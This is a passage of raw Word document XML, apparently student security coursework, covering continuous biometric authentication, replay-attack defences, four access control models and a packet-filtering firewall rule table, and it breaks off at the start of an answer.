          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Continuous Authentication Protocol: Dynamic biometric protocols involve the continuous monitoring and authentication of a user's biometric traits over time. For example, in a voice recognition system, the user's voice is continuously analyzed and compared against the enrolled voice model to provide ongoing authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F760ACC" w14:textId="079D11AF" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: Defending against replay attacks in dynamic biometric protocols can involve the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1A6D" w14:textId="0DBA0AAA" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Continuous Authentication: Instead of relying solely on a single biometric sample, continuous authentication involves continuously monitoring and analyzing the dynamic biometric traits over time. The system can compare the ongoing biometric patterns to ensure consistency and detect any discrepancies that may indicate a replay attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537CF4F" w14:textId="3F46C4B1" w:rsidR="000B2AD3" w:rsidRDefault="000B2AD3" w:rsidP="000B2AD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Time-based Verification: Timestamps can be used to ensure the freshness of the received dynamic biometric data. The server can compare the timestamps of the received data with a certain time window to prevent replay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4A214" w14:textId="6B26ACB1" w:rsidR="00E31CCE" w:rsidRDefault="00E31CCE" w:rsidP="00E31CCE">
      <w:pPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BBEB6D" w14:textId="0206FC3D" w:rsidR="00E31CCE" w:rsidRDefault="00A756DD" w:rsidP="00A756DD">
      <w:pPr>
        <w:ind w:left="-720" w:right="-360"/>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9.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A756DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>DAC, MAC, RBAC, and ABAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107728C" w14:textId="046CB606" w:rsidR="00A756DD" w:rsidRDefault="00690738" w:rsidP="00690738">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DAC (Discretionary Access Control): Users have discretion over granting or restricting access to resources they own, allowing them to set permissions for other users. Access decisions are based on the identity of the subject and the permissions assigned by the owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FA96B" w14:textId="2BF07CA7" w:rsidR="00690738" w:rsidRDefault="00690738" w:rsidP="00690738">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MAC (Mandatory Access Control): Access decisions are determined by a system-defined security policy, enforced by the operating system or security mechanisms. Users have limited control over access, as permissions are based on predefined security labels and rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EACA57" w14:textId="4A17D6B3" w:rsidR="00690738" w:rsidRDefault="00690738" w:rsidP="00690738">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RBAC (Role-Based Access Control): Access is granted based on predefined roles, where permissions are associated with roles rather than individual users. Users are assigned roles based on their job functions, simplifying administration and access control management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F3D1D" w14:textId="0FF10260" w:rsidR="00CF15B8" w:rsidRDefault="00690738" w:rsidP="00CF15B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABAC (Attribute-Based Access Control): Access decisions are based on attributes of the subject, resource, environment, and potentially other contextual information. Policies use these attributes to define access rules, enabling more fine-grained and dynamic access control based on specific conditions or attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4DAEB" w14:textId="6B7F2C21" w:rsidR="00CF15B8" w:rsidRDefault="00CF15B8" w:rsidP="00CF15B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CCE820" w14:textId="3D53CFF9" w:rsidR="00CF15B8" w:rsidRDefault="00CF15B8" w:rsidP="00CF15B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E6324" w14:textId="02BEB8D0" w:rsidR="00CF15B8" w:rsidRDefault="00CF15B8" w:rsidP="00CF15B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF15B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DAC allows owners to control access based on their discretion, MAC enforces strict hierarchical access levels based on system-defined rules, RBAC grants access based on predefined roles, and ABAC considers attributes and contextual information for dynamic access control decisions. DAC is user-centric, MAC is system-centric, RBAC simplifies administration, and ABAC offers fine-grained control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4BF5A" w14:textId="3BEDDDF4" w:rsidR="009162B8" w:rsidRDefault="009162B8" w:rsidP="00CF15B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784C4304" w14:textId="15958171" w:rsidR="005C5A1E" w:rsidRDefault="005C5A1E" w:rsidP="003955CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5A1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Firewall Policies in the Packet-Filtering Firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239384B3" w14:textId="5283FFCE" w:rsidR="003955CB" w:rsidRDefault="00404BB1" w:rsidP="00397FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Please explain the firewall policies in the packet-filtering firewall. And then, extend the policies to include source port numbers and flag options for the firewall policies. You can add anything in the current policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF95F0C" w14:textId="75C027B2" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00397FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-270" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="1336"/>
        <w:gridCol w:w="1479"/>
        <w:gridCol w:w="1193"/>
        <w:gridCol w:w="1336"/>
        <w:gridCol w:w="1336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00404BB1" w14:paraId="6D68506D" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D60E06A" w14:textId="5CE508A3" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00404BB1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0" w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="488E1647" w14:textId="2715E27D"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Direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DF97E7C" w14:textId="6212EF50"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Src address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3776029C" w14:textId="561E032B"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Dest address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="454EF0EA" w14:textId="65A9053F"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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="007D1D79" w14:textId="19C69D6B"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Dest Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AE063FA" w14:textId="77498B2E"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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="18AACD4B" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55E24C66" w14:textId="5B6D5D9E"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6599C6FC" w14:textId="51B48EBD"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In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57739AE5" w14:textId="2E71248F"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="090A2BDF" w14:textId="498FAE79"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6641B3F8" w14:textId="5C72E2A3"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01A22683" w14:textId="06D7B4C0"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44AC14E7" w14:textId="18DCC141"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="6F7E16EE" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B928059" w14:textId="4440302E"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E52C8D2" w14:textId="63CB8794"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Out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78EF0F1B" w14:textId="737A4B2D"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06237187" w14:textId="57702AC0"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18C6FF1E" w14:textId="0014FC56"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2535E8C8" w14:textId="2C369CCB"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2030140E" w14:textId="675B1D1D"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="31960C29" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53428AFE" w14:textId="2D78C75D"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ADB06B8" w14:textId="0BBE04EC"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Out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F9D8F84" w14:textId="67A9FAB2"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A97B084" w14:textId="2E72D4B1"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="085B91A5" w14:textId="181A3C7C"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BEF2AAD" w14:textId="2D6B984E"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6145107A" w14:textId="32850A80"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="58C44BA0" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="645D53B0" w14:textId="4A96D1CC"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B607C1F" w14:textId="41684CC8"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In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F86B4C2" w14:textId="0B8C370C"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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DD16E4A" w14:textId="6D15B880"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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0680D172" w14:textId="7668018C"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16EFBD9C" w14:textId="221D3D59"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&gt;1023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0649D02F" w14:textId="142A6450"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Permit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00404BB1" w14:paraId="2071A6CD" w14:textId="77777777" w:rsidTr="00404BB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D962DEF" w14:textId="39571912"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1335" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="056D30D9" w14:textId="08EA440C"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Either</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48F7B499" w14:textId="7B42C035"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61D81B29" w14:textId="0803B143"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A96DBF8" w14:textId="5B0D9B7F"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48819E66" w14:textId="4E5057C7"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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FA678B6" w14:textId="754908F5"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Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67BFDDC9" w14:textId="10C7FAD1" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00397FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EDD29B" w14:textId="132D495A" w:rsidR="00404BB1" w:rsidRDefault="00404BB1" w:rsidP="00397FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E84E1D" w14:textId="77777777" w:rsidR="00B32AF4" w:rsidRPr="00B32AF4" w:rsidRDefault="00404BB1" w:rsidP="00B32AF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:rPr>
